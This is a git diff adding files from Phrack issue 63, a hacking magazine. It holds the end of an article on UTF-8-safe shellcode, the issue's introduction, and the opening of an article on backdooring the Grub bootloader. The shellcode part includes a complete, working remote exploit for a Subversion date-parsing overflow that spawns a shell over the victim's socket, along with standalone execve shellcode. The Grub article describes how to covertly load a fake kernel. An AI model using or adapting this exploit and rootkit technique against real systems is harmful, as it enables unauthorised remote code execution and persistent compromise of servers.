+increase it 11 times :) 
+
+The new shellcode looks like this (wrapped into a C program so you
+can try it out):
+
+- ----------8<------------8<-------------8<------------8<---------------
+#include <stdio.h>
+
+char shellcode[]=
+    "\x31\xd2"                // xor    %edx,%edx
+    "\x90"                    // nop (UTF-8 - because previous byte was 0xd2)
+    "\x52"                    // push   %edx
+    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
+    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
+    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
+    "\x89\xe3"                // mov    %esp,%ebx
+    "\x90"                    // nop (UTF-8 - two nops because of 0xe3)
+    "\x90"                    // nop (UTF-8)
+    "\x52"                    // push   %edx
+    "\x53"                    // push   %ebx
+    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
+    "\x89\xe1"                // mov    %esp,%ecx
+    "\x90"                    // nop (UTF-8 - same here)
+    "\x90"                    // nop (UTF-8)
+    "\x52"                    // push %edx
+    "\x58"                    // pop %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\x40"                    // inc %eax
+    "\xcd\x80"                // int    $0x80
+    ;
+
+void main()
+{
+   int *ret;
+   FILE *fp;
+   fp=fopen("out","w");
+   fwrite(shellcode,strlen(shellcode),1,fp);
+   fclose(fp);
+   ret=(int *)(&ret+2);
+   *ret=(int)shellcode;
+}
+- ----------8<------------8<-------------8<------------8<---------------
+
+As you can see, I used nop's as continuation bytes as well as salc
+to mask out continuation bytes. You'll quickly get an eye for this
+if you do it often.
+
+- ---] 5.3. Let's try it out
+
+greuff@pluto:/tmp$ gcc test.c -o test
+test.c: In function `main':
+test.c:37: warning: return type of `main' is not `int'
+greuff@pluto:/tmp$ ./test
+sh-2.05b$ exit
+exit
+greuff@pluto:/tmp$ hexdump -C out
+00000000  31 d2 90 52 68 6e 2f 73  68 68 2f 2f 62 69 d6 89  |1..Rhn/shh//bi..|
+00000010  e3 90 90 52 53 d6 89 e1  90 90 52 58 40 40 40 40  |...RS.....RX@@@@|
+00000020  40 40 40 40 40 40 40 cd  80                       |@@@@@@@..|
+00000029
+greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 out && echo valid!
+1Rhn/shh//bi4RSRX@@@@@@@@@@@@valid!
+greuff@pluto:/tmp$
+
+Hooray! :-)
+
+- ---] 5.4. A real exploit using these techniques
+
+The recent date parsing buffer overflow in Subversion <= 1.0.2 led
+me into researching these problems and writing the following exploit.
+It isn't 100% finished; but it works against svn:// and http:// URLs.
+The first shellcode stage is a hand crafted UTF-8-shellcode, that
+searches for the socket file descriptor and loads a second stage shellcode
+from the exploit and executes it. A real life example showing you that
+these things actually work :)
+
+- ----------8<------------8<-------------8<------------8<---------------
+/*****************************************************************
+ * hoagie_subversion.c
+ *
+ * Remote exploit against Subversion-Servers.
+ *
+ * Author: greuff <greuff@void.at>
+ *
+ * Tested on Subversion 1.0.0 and 0.37
+ *
+ * Algorithm:
+ * This is a two-stage exploit. The first stage overflows a buffer
+ * on the stack and leaves us ~60 bytes of machine code to be
+ * executed. We try to find the socket-fd there and then do a 
+ * read(2) on the socket. The exploit then sends the second stage
+ * loader to the server, which can be of any length (up to the
+ * obvious limits, of course). This second stage loader spawns 
+ * /bin/sh on the server and connects it to the socket-fd.
+ *
+ * Credits:
+ *    void.at
+ *
+ * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
+ * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
+ * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
+ *
+ *****************************************************************/
+
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <stdio.h>
+#include <errno.h>
+#include <string.h>
+#include <fcntl.h>
+#include <netdb.h>
+
+enum protocol { SVN, SVNSSH, HTTP, HTTPS };
+
+char stage1loader[]=
+             // begin socket fd search
+             "\x31\xdb"            // xor %ebx, %ebx
+             "\x90"                // nop (UTF-8)
+             "\x53"                // push %ebx
+             "\x58"                // pop %eax
+             "\x50"                // push %eax
+             "\x5f"                // pop %edi                # %eax = %ebx = %edi = 0
+             "\x2c\x40"            // sub $0x40, %al
+             "\x50"                // push %eax
+             "\x5b"                // pop %ebx
+             "\x50"                // push %eax
+             "\x5a"                // pop %edx                # %ebx = %edx = 0xC0
+             "\x57"                // push %edi
+             "\x57"                // push %edi               # safety-0
+             "\x54"                // push %esp
+             "\x59"                // pop %ecx                # %ecx = pointer to the buffer
+             "\x4b"                // dec %ebx                # beginloop:
+             "\x57"                // push %edi
+             "\x58"                // pop %eax                # clear %eax
+             "\xd6"                // salc (UTF-8)
+             "\xb0\x60"            // movb $0x60, %al
+             "\x2c\x44"            // sub $0x44, %al          # %eax = 0x1C
+             "\xcd\x80"            // int $0x80               # fstat(i, &stat)
+             "\x58"                // pop %eax
+             "\x58"                // pop %eax
+             "\x50"                // push %eax
+             "\x50"                // push %eax
+             "\x38\xd4"            // cmp %dl, %ah            # uppermost 2 bits of st_mode set?
+             "\x90"                // nop (UTF-8)
+             "\x72\xed"            // jb beginloop
+             "\x90"                // nop (UTF-8)
+             "\x90"                // nop (UTF-8)             # %ebx now contains the socket fd
+             // begin read(2)
+             "\x57"                // push %edi
+             "\x58"                // pop %eax                # zero %eax
+             "\x40"                // inc %eax
+             "\x40"                // inc %eax
+             "\x40"                // inc %eax                # %eax=3
+             //"\x54"                // push %esp
+             //"\x59"                // pop %ecx                # %ecx ... address of buffer
+             //"\x54"                // push %edi
+             //"\x5a"                // pop %edx                # %edx ... bufferlen (0xC0)
+             "\xcd\x80"            // int $0x80               # read(2) second stage loader
+             "\x39\xc7"            // cmp %eax, %edi
+             "\x90"                // nop (UTF-8)
+             "\x7f\xf3"            // jg startover
+             "\x90"                // nop (UTF-8)
+             "\x90"                // nop (UTF-8)
+             "\x90"                // nop (UTF-8)
+             "\x54"                // push %esp
+             "\xc3"                // ret                     # execute second stage loader
+             "\x90"                // nop (UTF-8)
+             "\0"    // %ebx still contains the fd we can use in the 2nd stage loader.
+             ;
+
+char stage2loader[]=
+             // dup2 - %ebx contains the fd
+             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
+             "\xb9\x00\x00\x00\x00"   // mov $0x0, %ecx
+             "\xcd\x80"               // int $0x80
+             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
+             "\xb9\x01\x00\x00\x00"   // mov $0x1, %ecx
+             "\xcd\x80"               // int $0x80
+             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
+             "\xb9\x02\x00\x00\x00"   // mov $0x2, %ecx
+             "\xcd\x80"               // int $0x80
+             // start /bin/sh
+             "\x31\xd2"               // xor %edx, %edx
+             "\x52"                   // push %edx
+             "\x68\x6e\x2f\x73\x68"   // push $0x68732f6e
+             "\x68\x2f\x2f\x62\x69"   // push $0x69622f2f
+             "\x89\xe3"               // mov %esp, %ebx
+             "\x52"                   // push %edx
+             "\x53"                   // push %ebx
+             "\x89\xe1"               // mov %esp, %ecx
+             "\xb8\x0b\x00\x00\x00"   // mov $0xb, %eax
+             "\xcd\x80"               // int $0x80
+             "\xb8\x01\x00\x00\x00"   // mov $0x1, %eax
+             "\xcd\x80"               // int %0x80     (exit)
+             ;
+
+int stage2loaderlen=69;
+             
+char requestfmt[]=
+"REPORT %s HTTP/1.1\n"
+"Host: %s\n"
+"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
+"Content-Length: %d\n"
+"Content-Type: text/xml\n"
+"Connection: close\n\n"
+"%s\n";
+
+char xmlreqfmt[]=
+"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
+"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
+"<D:creationdate>%s%c%c%c%c</D:creationdate>"
+"</S:dated-rev-report>";
+
+int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
+{
+   char *ptr;
+   char bfr[1000];
+   
+   ptr=strstr(uri,"://");
+   if(!ptr) return -1;
+   *ptr=0;
+   snprintf(bfr,sizeof(bfr),"%s",uri);
+   if(!strcmp(bfr,"http"))
+      *proto=HTTP, *port=80;
+   else if(!strcmp(bfr,"svn"))
+      *proto=SVN, *port=3690;
+   else
+   {
+      printf("Unsupported protocol %s\n",bfr);
+      return -1;
+   }
+   uri=ptr+3;
+   if((ptr=strchr(uri,':')))
+   {
+      *ptr=0;
+      snprintf(host,1000,"%s",uri);
+      uri=ptr+1;
+      if((ptr=strchr(uri,'/'))==NULL) return -1;
+      *ptr=0;
+      snprintf(bfr,1000,"%s",uri);
+      *port=(int)strtol(bfr,NULL,10);
+      *ptr='/';
+      uri=ptr;
+   }
+   else if((ptr=strchr(uri,'/')))
+   {
+      *ptr=0;
+      snprintf(host,1000,"%s",uri);
+      *ptr='/';
+      uri=ptr;
+   }
+   snprintf(repos,1000,"%s",uri);
+   return 0;
+}
+
+int exec_sh(int sockfd)
+{
+   char snd[4096],rcv[4096];
+   fd_set rset;
+   while(1)
+   {
+      FD_ZERO(&rset);
+      FD_SET(fileno(stdin),&rset);
+      FD_SET(sockfd,&rset);
+      select(255,&rset,NULL,NULL,NULL);
+      if(FD_ISSET(fileno(stdin),&rset))
+      {
+         memset(snd,0,sizeof(snd));
+         fgets(snd,sizeof(snd),stdin);
+         write(sockfd,snd,strlen(snd));
+      }
+      if(FD_ISSET(sockfd,&rset))
+      {
+         memset(rcv,0,sizeof(rcv));
+         if(read(sockfd,rcv,sizeof(rcv))<=0)
+            exit(0);
+         fputs(rcv,stdout);
+      }
+   }
+}
+
+int main(int argc, char **argv)
+{
+   int sock, port;
+   size_t size;
+   char cmd[1000], reply[1000], buffer[1000];
+   char svdcmdline[1000];
+   char host[1000], repos[1000], *ptr, *caddr;
+   unsigned long addr;
+   struct sockaddr_in sin;
+   struct hostent *he;
+   enum protocol proto;
+
+   /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
+   write(sock,stage1loader,strlen(stage1loader));
+   close(sock);
+   return 0;*/
+
+   printf("hoagie_subversion - remote exploit against subversion servers\n"
+          "by greuff@void.at\n\n");
+   if(argc!=3)
+   {
+      printf("Usage: %s serverurl offset\n\n",argv[0]);
+      printf("Examples:\n"
+             "   %s svn://localhost/repository 0x41414141\n"
+             "   %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
+      printf("The offset is an alphanumeric address (or UTF-8 to be\n"
+             "more precise) of a pop instruction, followed by a ret.\n"
+             "Brute force when in doubt.\n\n");
+      printf("When exploiting against an svn://-url, you can supply a\n"
+             "binary offset too.\n\n");
+      exit(1);
+   }
+
+   // parse the URI
+   snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
+   if(parse_uri(argv[1],&proto,host,&port,repos)<0)
+   {
+      printf("URI parse error\n");
+      exit(1);
+   }
+   printf("parse_uri result:\n"
+          "Protocol: %d\n"
+          "Host: %s\n"
+          "Port: %d\n"
+          "Repository: %s\n\n",proto,host,port,repos);
+   addr=strtoul(argv[2],NULL,16);
+   caddr=(char *)&addr;
+   printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);
+
+   sock=socket(AF_INET,SOCK_STREAM,0);
+   if(sock<0)
+   {
+      perror("socket");
+      return -1;
+   }
+
+   he=gethostbyname(host);
+   if(he==NULL)
+   {
+      herror("gethostbyname");
+      return -1;
+   }
+   sin.sin_family=AF_INET;
+   sin.sin_port=htons(port);
+   memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
+   if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
+   {
+      perror("connect");
+      return -1;
+   }
+
+   if(proto==SVN)
+   {
+      size=read(sock,reply,sizeof(reply));
+      reply[size]=0;
+      printf("Server said: %s\n",reply);
+      snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
+      write(sock,cmd,strlen(cmd));
+      size=read(sock,reply,sizeof(reply));
+      reply[size]=0;
+      printf("Server said: %s\n",reply);
+      strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
+      write(sock,cmd,strlen(cmd));
+      size=read(sock,reply,sizeof(reply));
+      reply[size]=0;
+      printf("Server said: %s\n",reply);
+      snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
+            caddr[0],caddr[1],caddr[2],caddr[3]);
+      write(sock,cmd,strlen(cmd));
+      size=read(sock,reply,sizeof(reply));
+      reply[size]=0;
+      printf("Server said: %s\n",reply); 
+   }
+   else if(proto==HTTP)
+   {
+      // preparing the request...
+      snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
+            caddr[0],caddr[1],caddr[2],caddr[3]);
+      size=strlen(buffer);
+      snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
+
+      // now sending the request, immediately followed by the 2nd stage loader
+      printf("Sending:\n%s",cmd);
+      write(sock,cmd,strlen(cmd));
+      sleep(1);
+      write(sock,stage2loader,stage2loaderlen);
+   }
+
+   // SHELL LOOP
+   printf("Entering shell loop...\n");
+   exec_sh(sock);
+
+   /*sleep(1);
+   close(sock);
+   printf("\nConnecting to the shell...\n");
+   exec_sh(connect_sh()); */
+   return 0;
+}
+- ----------8<------------8<-------------8<------------8<---------------
+
+- ----------------------------------------------------------------------------
+
+- ---] 6. Considerations
+
+Some thoughts about the whole topic.
+
+- ---] 6.1. Automated shellcode transformer
+
+Perhaps it's possible to write an automated shellcode transformer that gets
+a shellcode and outputs the shellcode UTF-8 compatible (similar to rix's
+alphanumeric shellcode compiler [4]), but it would be a challenge. Many
+decisions during the transformation process cannot be automated in my
+opinion. (By the way - alphanumeric shellcode is of course valid UTF-8!
+So if you want to save time and space it's not a problem, just use the 
+alphanumeric shellcode compiler on your shellcode and use that!)
+
+- ---] 6.2. UTF-8 in XML-files
+
+When you write UTF-8 shellcode for the purpose of sending it in an XML-
+document, you'll have to care for a few more things. The bytes \x00 to
+\x08 are forbidden in XML, as well as the obvious characters like '<',
+'>' and so on. Don't forget that when you exploit your favourite XML-
+processing app!
+ 
+- ----------------------------------------------------------------------------
+
+- ---] 7. Greetings, last words
+
+andi@void.at (man, get a nick :))
+soletario (the indoor snowboarder)
+ReAction
+all the other people who often helped me out
+
+- ----------------------------------------------------------------------------
+
+[1] http://www.cl.cam.ac.uk/~mgk25/unicode.html
+[2] http://www.unicode.org/versions/corrigendum1.html
+[3] http://www.x86.org/secrets/opcodes/salc.htm
+[4] http://www.phrack.org/show.php?p=57&a=15
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/1.txt b/phrack63/1.txt
new file mode 100644
index 0000000..ea4e02c
--- /dev/null
+++ b/phrack63/1.txt
@@ -0,0 +1,146 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x01 of 0x14
+
+
+[-]=====================================================================[-]
+[-]=====================================================================[-]
+[-]=====================================================================[-]
+
+
+For 20 years PHRACK magazine has been the most technical, most original,
+the most Hacker magazine in the world. The last five of those years have
+been under the guidance of the current editorial team. Over that time, many
+new techniques, new bugs and new attacks have been published in PHRACK. We
+enojoyed every single moment working on the magazine.
+
+The time is right for new blood, and a fresh phrackstaff.
+
+PHRACK 63 marks the end of the line for some and the start of the line for
+others. Our hearts will alwasy be with PHRACK.
+
+Expect a new release, under a new regime, sometime in 2006/2007.
+
+As long as there is technology, there will be hackers. As long as there are
+hackers, there will be PHRACK magazine. We look forward to the next 20 years. 
+
+
+ __^__                                                               __^__
+( ___ )-------------------------------------------------------------( ___ )
+ | / | 0x01 Introduction                         phrackstaff 0x07 kb | \ |
+ | / | 0x02 Loopback                             phrackstaff 0x05 kb | \ |
+ | / | 0x03 Linenoise                            phrackstaff 0x1c kb | \ |
+ | / |      .1 Analysing suspicious binary files                     | \ |
+ | / |      .2 TCP Timestamp to count hosts behind NAT               | \ |
+ | / |      .3 Elliptic Curve Cryptography                           | \ |
+ | / | 0x04 Phrack Prophile on Tiago             phrackstaff 0x21 kb | \ |
+ | / | 0x05 OS X heap exploitation techniques           Nemo 0x24 kb | \ |
+ | / | 0x06 Hacking Windows CE (pocketpcs & others)      San 0x33 kb | \ |
+ | / | 0x07 Games with kernel Memory...FreeBSD Style   jkong 0x2e kb | \ |
+ | / | 0x08 Raising The Bar For Windows Rootkit Detection    0x4c kb | \ |
+ | / |                          Jamie Butler & Sherri Sparks         | \ |
+ | / | 0x09 Embedded ELF Debugging                ELFsh crew 0x5b kb | \ |
+ | / | 0x0a Hacking Grub for Fun & Profit              CoolQ 0x2a kb | \ |
+ | / | 0x0b Advanced antiforensics : SELF        Ripe & Pluf 0x29 kb | \ |
+ | / | 0x0c Process Dump and Binary Reconstruction       ilo 0x69 kb | \ |
+ | / | 0x0d Next-Gen. Runtime Binary Encryption        Zvrba 0x45 kb | \ |
+ | / | 0x0e Shifting the Stack Pointer               andrewg 0x1a kb | \ |
+ | / | 0x0f NT Shellcode Prevention Demystified        Piotr 0xdc kb | \ |
+ | / | 0x10 PowerPC Cracking on OSX with GDB         curious 0x1b kb | \ |
+ | / | 0x11 Hacking with Embedded Systems              cawan 0x27 kb | \ |
+ | / | 0x12 Process Hiding & The Linux Scheduler        Ubra 0x2c kb | \ |
+ | / | 0x13 Breaking Through a Firewall              kotkrye 0x1e kb | \ |
+ | / | 0x14 Phrack World News                    phrackstaff 0x0a kb | \ |
+ |___|_____________[  PHRACK, NO FEAR & NO DOUBT   ]_________________|___|
+(_____)-------------------------------------------------------------(_____)
+   ^                                                                   ^
+
+Shoutz:
+Phenoelit                : beeing cool & quick with solutions at WTH.
+The Dark Tangent         : masterminding defc0n
+joep                     : no joep == no hardcover.
+rootfiend, lirakis, dink : arizona printing & for keepting the spirit alive
+
+
+Enjoy the magazine!
+
+Phrack Magazine Vol 11 Number 63, Build 2, Jul 30, 2005. ISSN 1068-1035
+Contents Copyright (c) 2005 Phrack Magazine.  All Rights Reserved.
+
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. Phrack Magazine is made available to the 
+public, as often as possible, free of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : pwn@phrack.org
+
+  Note: You must put the word 'ANTISPAM' somewhere in the Subject-line of
+your email. All others will meet their master in /dev/null. We reply to
+every email. Lame emails make it into loopback.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.1 (GNU/Linux)
+
+mQGiBELk+MARBACP4uJ+aCmxUejehggv2Us9aUg0JV0/fbsvANY45uYCFprOOCQt
+/DTvvbkEEFE89CsAAMTGLWFoxfChVzJ8s01ZQSyoQP0bcT1+c08p2yDXPJd9AQT8
+TNF9fdeKCgW3TGaYl/ggHPrJOExXbc4iQptfAXrzPLVa1IjbJIfA76OTrwCgncme
+dl2rmPrJ6aUkdtWwO+4MwOsD/0Z+WKLPWPJpsT6jXHHKtniEyc4Oy83b5nJch72A
+Z5/PnIY0CoTR2JkYT7o5unFmu57N99FiNSlKOCnrec9/IQrty3iQhI+ISiCOqd/a
+3hfSoegInf3iqad4SBgxCy+bEqIxOl6GDtI2GbB3V7rjeFn6Ik/gC3V/4JnMbj/U
+2FVNA/wLKu2NUFG2nTznkcYXHmOjAz7JAufyLuQI8n9ha0HZ6H4hrDN/xOZrqTIY
+uRWdc12qgV/awSjRde+UIcm3tMFO/H771iUktPVSxefpXEADnQ0xgQV86WBL6+32
+kDDF+nYIbqTy5SBQrxfUfycyE8CWqQ97CoBkhcpBy2tNKO6OGbQLcGhyYWNrc3Rh
+ZmaIXgQTEQIAHgUCQuT4wAIbAwYLCQgHAwIDFQIDAxYCAQIeAQIXgAAKCRANbHBh
+kEdcM0zIAKCE1ysoiu7o96qzD+P2wTipsjvITwCZAaSznPOGTPEesxbD0RkejuOg
+DLe5Ag0EQuT4xRAIALDbRMPpYFSGQwcHJf9fTGTZeU+RyfCelYXYRi9F28SkbrI/
+FkdQHIe8/FFiQtIVIkkbw+UZPsSJenkUebA8wQCTKWpkDkwIoFJQxrpef5wHE3J4
+zJ+fBgSNovfEMChe58wYcnuyaWM4eQ72ZnGw7C92spQD1QGajxFZlUXBBa6K3nRW
+7xJhXsuYMgPXQ8mi6OIYiOiOa4RfrYrKIUQR/2AwZcO4KK/l4DWjfSjEYh9i3/Ch
+7u8vX82skoIabgEFGDQZPG9afI/7TGXpQDQRc4ERHtDP64KIJwVA85e7d8sYjLHm
+ocNTIMQHg4MAOoKt+LOYr5qltXZiKI8A/3p77k8AAwUH/ia+AexXwN1zrmn46lBs
+7GTaLYI5sM+f/gBzgm81KPjaknbfARJ6+Z2vtgM9OcAHnbW2mkcpuglhVEAQ0+lr
+G1ig4xxCqS1yTYlTLbPgzuetjMHJEf4XYTsYOHZRfDJinSJZb+vwa0LEhzE/YVuc
+EUEBhKsJWo7mYdoTLuMblfw/eWYs+LMmUVp+HnF9NxWHwqsJiHGSnEX4Kd3264lU
+vtsq478wmdMokRHTK23p8uiiWLL8Cl/kMlw8ARVJLqDqoEFAmzO8Rbc5PIzIZPJT
+9yf2U5a5jzoZITIuuCBtY9pZ9ww0+SjXJ8xsW1CrNNSYPumnBAmgPgCfvZNoQ5hk
+7gOISQQYEQIACQUCQuT4xQIbDAAKCRANbHBhkEdcM+c7AJ9PqXpUL+EkzHIlfOYz
+96MpjPYm5QCgiqW0EZcest0fguHXc8K6KDXYpzg=
+=m9ny
+-----END PGP PUBLIC KEY BLOCK-----
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
diff --git a/phrack63/10.txt b/phrack63/10.txt
new file mode 100644
index 0000000..5188962
--- /dev/null
+++ b/phrack63/10.txt
@@ -0,0 +1,884 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x0a of 0x14
+
+|=-----------------=[ Hacking Grub for fun and profit ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ CoolQ <qufuping@ercist.iscas.ac.cn> ]=---------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+    0.0 - Trojan/backdoor/rootkit review
+
+    1.0 - Boot process with Grub
+        1.1 How does Grub work ?
+        1.2 stage1
+        1.3 stage1.5 & stage2
+        1.4 Grub util
+
+    2.0 - Possibility to load specified file
+
+    3.0 - Hacking techniques
+        3.1 How to load file_fake
+        3.2 How to locate ext2fs_dir
+        3.3 How to hack grub
+        3.4 How to make things sneaky
+
+    4.0 - Usage
+
+    5.0 - Detection
+
+    6.0 - At the end
+
+    7.0 - Ref
+
+    8.0 - hack_grub.tar.gz
+
+--[ 0.0 - Trojan/backdoor/rootkits review
+
+    Since 1989 when the first log-editing tool appeared(Phrack 0x19 #6 -
+Hiding out under Unix), the trojan/backdoor/rootkit have evolved greatly.
+From the early user-mode tools such as LRK4/5, to kernel-mode ones such as
+knark/adore/adore-ng, then appears SuckIT, module-injection, nowadays even
+static kernel-patching.
+    Think carefully, what remains untouched? Yes, that's bootloader. 
+    So, in this paper, I present a way to make Grub follow your order, that
+is, it can load another kernel/initrd image/grub.conf despite the file you
+specify in grub.conf.
+
+P.S.: This paper is based on Linux and EXT2/3 under x86 system.
+
+--[ 1.0 - Boot process with Grub
+
+----[ 1.1 - How does Grub work ?
+
+                       +-----------+
+                       | boot,load |
+                       |    MBR    |
+                       +-----+-----+
+                             |
+                     +----------------+     NO
+                     | Grub is in MBR +------->-------+
+                     +-------+--------+               |
+                        Yes  |  stage1        +-------+--------+
+               Yes  +--------+---------+      | jump to active |
+             +--<---+ stage1.5 config? |      |    partition   |
+             |      +--------+---------+      +-------+--------+
+             |            No |                        |
+     +-------+-------+       |       |          +-----+-----+   
+     | load embedded |       |         stage1-> | load boot | 
+     |   sectors     |       |       |          |   sector  |
+     +-------+-------+       V                  +-----+-----+
+        ^    |               |       + - - - < - - -  + Cf 1.3
+        |    |               |                 +------+------+
+   stage1.5  +-------->------+--------->-------+ load stage2 +
+                                               +------+------+
+                                                      |
+                             +---------------<--------+
+                             V
+                 +-----------+-----------+
+                 |   load the grub.conf  |
+                 | display the boot menu |
+                 +-----------+-----------+
+                             | User interaction
+                   +---------+---------+
+                   | load kernel image |
+                   |     and boot      |
+                   +-------------------+
+
+----[ 1.2 - stage1
+
+    stage1 is 512 Bytes, you can see its source code in stage1/stage1.S .
+It's installed in MBR or in boot sector of primary partition. The task is
+simple - load a specified sector (defined in stage2_sector) to a specified
+address(defined in stage2_address/stage2_segment). If stage1.5 is
+configured, the first sector of stage1.5 is loaded at address 0200:000; if
+not, the first sector of stage2 is loaded at address 0800:0000.
+
+----[ 1.3 - stage1.5 & stage2
+
+    We know Grub is file-system-sensitive loader, i.e. Grub can understand
+and read files from different file-systems, without the help of OS. Then
+how? The secret is stage1.5 & stage2. Take a glance at /boot/grub, you'll
+find the following files:
+stage1, stage2, e2fs_stage1_5, fat_stage1_5, ffs_stage1_5, minix_stage1_5,
+reiserfs_stage1_5, ... 
+    We've mentioned stage1 in 1.2, the file stage1 will be installed in MBR
+or in boot sector. So even if you delete file stage1, system boot are not
+affected.
+    What about zeroing file stage2 and *_stage1_5? Can system still boot?
+The answer is 'no' for the former and 'yes' for the latter. You're
+wondering about the reason? Then continue your reading...
+
+    Let's see how *_stage1_5 and stage2 are generated:
+
+-------------------------------- BEGIN -----------------------------------
+e2fs_stage1_5:
+gcc -o e2fs_stage1_5.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,2000
+   e2fs_stage1_5_exec-start.o e2fs_stage1_5_exec-asm.o
+   e2fs_stage1_5_exec-common.o e2fs_stage1_5_exec-char_io.o
+   e2fs_stage1_5_exec-disk_io.o e2fs_stage1_5_exec-stage1_5.o
+   e2fs_stage1_5_exec-fsys_ext2fs.o e2fs_stage1_5_exec-bios.o  
+objcopy -O binary e2fs_stage1_5.exec e2fs_stage1_5
+
+stage2:
+gcc -o pre_stage2.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,8200
+   pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-boot.o
+   pre_stage2_exec-builtins.o pre_stage2_exec-common.o
+   pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o
+   pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o
+   pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o
+   pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o
+   pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o
+   pre_stage2_exec-hercules.o pre_stage2_exec-serial.o
+   pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o
+   pre_stage2_exec-md5.o
+objcopy -O binary pre_stage2.exec pre_stage2
+cat start pre_stage2 > stage2
+--------------------------------- END ------------------------------------
+
+   According to the output above, the layout should be:
+e2fs_stage1_5:
+  [start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stage1_5.c]
+  [fsys_ext2fs.c] [bios.c]
+stage2:
+  [start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c]
+  [cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c]
+  [fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c]
+  [hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c]
+
+    We can see e2fs_stage1_5 and stage2 are similar. But e2fs_stage1_5 is
+smaller, which contains basic modules(disk io, string handling, system
+initialization, ext2/3 file system handling), while stage2 is all-in-one,
+which contains all file system modules, display, encryption, etc.
+
+    start.S is very important for Grub. stage1 will load start.S to
+0200:0000(if stage1_5 is configured) or 0800:0000(if not), then jump to
+it. The task of start.S is simple(only 512Byte),it will load the rest parts
+of stage1_5 or stage2 to memory. The question is, since the file-system
+related code hasn't been loaded, how can grub know the location of the rest
+sectors? start.S makes a trick:
+
+-------------------------------- BEGIN -----------------------------------
+blocklist_default_start:
+	.long 2		/* this is the sector start parameter, in logical
+        		   sectors from the start of the disk, sector 0 */
+blocklist_default_len:	/* this is the number of sectors to read */
+#ifdef STAGE1_5
+	.word 0		/* the command "install" will fill this up */
+#else
